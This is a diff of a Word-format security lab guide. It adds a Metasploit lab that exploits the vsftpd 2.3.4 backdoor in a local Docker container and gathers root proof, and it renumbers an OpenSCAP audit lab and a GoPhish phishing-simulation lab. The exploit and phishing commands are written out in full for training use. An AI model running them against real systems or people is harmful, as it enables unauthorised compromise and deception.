+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="41" name="Picture 41"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-33.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 33 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8165,7 +12346,7 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Full step-by-step commands and references are in labs/lab-34-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+        <w:t>Full step-by-step commands and references are in labs/lab-33-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8174,17 +12355,17 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Lab 35 — Compliance Audit with OpenSCAP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Scan a host against a CIS profile and remediate.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Audit an Ubuntu host against a CIS profile with OpenSCAP, produce the HTML report, and remediate a control.</w:t>
+        <w:t>Lab 34 — Penetration Testing with Metasploit (Authorised Lab)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Exploit a vulnerable target and write the report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Exploit a deliberately vulnerable vsftpd service with Metasploit, prove compromise, then write the report.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8199,7 +12380,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>OpenSCAP CIS compliance scan and report   (Tools: openscap-scanner/libopenscap8, ssg-base, ssg-debderived.)</w:t>
+        <w:t>Metasploit exploit of a lab FTP container   (Tools: metasploit-framework, docker.io, nmap.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8217,7 +12398,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Install the SSG content and OpenSCAP scanner</w:t>
+        <w:t>Install Metasploit via the Rapid7 installer script</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8227,7 +12408,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>apt install -y openscap-scanner || apt install -y libopenscap8</w:t>
+        <w:t>curl -sSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; /tmp/msfinstall</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8235,7 +12416,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Select the Ubuntu SCAP datastream</w:t>
+        <w:t>Stand up the vulnerable FTP target in Docker</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8245,7 +12426,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>DS=$(ls /usr/share/xml/scap/ssg/content/ssg-ubuntu*-ds.xml | head -1)</w:t>
+        <w:t>docker run -d --name vuln -p 2121:21 --rm tleemcjr/metasploitable2 /bin/bash -c "service vsftpd start &amp;&amp; sleep infinity"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8253,7 +12434,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>List available compliance profiles</w:t>
+        <w:t>Recon the target service banner</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8263,7 +12444,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>oscap info $DS | grep -A1 Profile | head -20</w:t>
+        <w:t>nmap -sV -p 2121 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8271,7 +12452,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Run the CIS Level 1 audit</w:t>
+        <w:t>Search Metasploit for matching modules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8281,7 +12462,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_cis_level1_server --results-arf arf.xml --report report.html $DS</w:t>
+        <w:t>msfconsole -q -x "search vsftpd; exit"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8289,7 +12470,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Generate the auto-remediation script</w:t>
+        <w:t>Run the vsftpd backdoor exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8299,7 +12480,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>oscap xccdf generate fix --profile xccdf_org.ssgproject.content_profile_cis_level1_server --output remediate.sh $DS</w:t>
+        <w:t>msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 127.0.0.1; set RPORT 2121; exploit -z; exit"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8307,7 +12488,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Apply one fix and re-check the rule</w:t>
+        <w:t>Collect post-exploitation proof (id, uname)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8317,7 +12498,43 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>oscap xccdf eval --rule xccdf_org.ssgproject.content_rule_package_telnet_removed $DS</w:t>
+        <w:t>sessions -i 1 -c 'id; uname -a; whoami; hostname'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Clean up the target container</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>docker rm -f vuln</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Write the engagement report</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>cat pentest-report.md</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8332,7 +12549,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>report.html shows pass/fail per control and the score rises after remediation.</w:t>
+        <w:t>A command session opens and `id` returns uid=0(root) from the target container.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="42" name="Picture 42"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-34.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId50"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 34 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8347,7 +12616,7 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Full step-by-step commands and references are in labs/lab-35-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+        <w:t>Full step-by-step commands and references are in labs/lab-34-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8356,17 +12625,17 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Lab 36 — Security Awareness: Run a Phishing Simulation with GoPhish</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Operate a phishing simulation end-to-end with metrics.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Run a controlled phishing simulation with GoPhish and a MailHog sink, tracking click and open metrics.</w:t>
+        <w:t>Lab 35 — Compliance Audit with OpenSCAP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Scan a host against a CIS profile and remediate.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Audit an Ubuntu host against a CIS profile with OpenSCAP, produce the HTML report, and remediate a control.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8381,7 +12650,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>GoPhish campaign with a MailHog SMTP sink   (Tools: gophish, docker.io, mailhog, curl, unzip.)</w:t>
+        <w:t>OpenSCAP CIS compliance scan and report   (Tools: openscap-scanner/libopenscap8, ssg-base, ssg-debderived.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8399,7 +12668,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Download and unzip the GoPhish binary</w:t>
+        <w:t>Install the SSG content and OpenSCAP scanner</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8409,7 +12678,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -LO https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip</w:t>
+        <w:t>apt install -y openscap-scanner || apt install -y libopenscap8</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8417,7 +12686,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bind the admin UI to all interfaces</w:t>
+        <w:t>Select the Ubuntu SCAP datastream</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8427,7 +12696,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>sed -i 's/127.0.0.1:3333/0.0.0.0:3333/' config.json</w:t>
+        <w:t>DS=$(ls /usr/share/xml/scap/ssg/content/ssg-ubuntu*-ds.xml | head -1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8435,7 +12704,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Start GoPhish and note the admin password</w:t>
+        <w:t>List available compliance profiles</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8445,7 +12714,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>./gophish 2&gt;&amp;1 | grep -E "admin|password" | head -3</w:t>
+        <w:t>oscap info $DS | grep -A1 Profile | head -20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8453,7 +12722,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Spin up the MailHog SMTP sink</w:t>
+        <w:t>Run the CIS Level 1 audit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8463,7 +12732,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>docker run -d -p 1025:1025 -p 8025:8025 mailhog/mailhog</w:t>
+        <w:t>oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_cis_level1_server --results-arf arf.xml --report report.html $DS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8471,7 +12740,17 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Configure the four GoPhish primitives in the UI</w:t>
+        <w:t>Generate the auto-remediation script</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>oscap xccdf generate fix --profile xccdf_org.ssgproject.content_profile_cis_level1_server --output remediate.sh $DS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8479,15 +12758,17 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Launch the campaign and watch the dashboard</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Map click rates to training actions</w:t>
+        <w:t>Apply one fix and re-check the rule</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>oscap xccdf eval --rule xccdf_org.ssgproject.content_rule_package_telnet_removed $DS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8502,7 +12783,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The campaign dashboard tracks sent/opened/clicked and test emails appear in MailHog.</w:t>
+        <w:t>report.html shows pass/fail per control and the score rises after remediation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="43" name="Picture 43"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-35.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId51"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 35 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8517,6 +12850,228 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-35-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 36 — Security Awareness: Run a Phishing Simulation with GoPhish</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Operate a phishing simulation end-to-end with metrics.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Run a controlled phishing simulation with GoPhish and a MailHog sink, tracking click and open metrics.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>GoPhish campaign with a MailHog SMTP sink   (Tools: gophish, docker.io, mailhog, curl, unzip.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Step-by-step</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Download and unzip the GoPhish binary</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>curl -LO https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Bind the admin UI to all interfaces</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>sed -i 's/127.0.0.1:3333/0.0.0.0:3333/' config.json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Start GoPhish and note the admin password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>./gophish 2&gt;&amp;1 | grep -E "admin|password" | head -3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Spin up the MailHog SMTP sink</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>docker run -d -p 1025:1025 -p 8025:8025 mailhog/mailhog</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Configure the four GoPhish primitives in the UI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Launch the campaign and watch the dashboard</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Map click rates to training actions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The campaign dashboard tracks sent/opened/clicked and test emails appear in MailHog.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="44" name="Picture 44"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-36.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId52"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 36 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
         <w:t>Full step-by-step commands and references are in labs/lab-36-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
@@ -8824,7 +13379,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId10"/>
+      <w:footerReference w:type="default" r:id="rId53"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
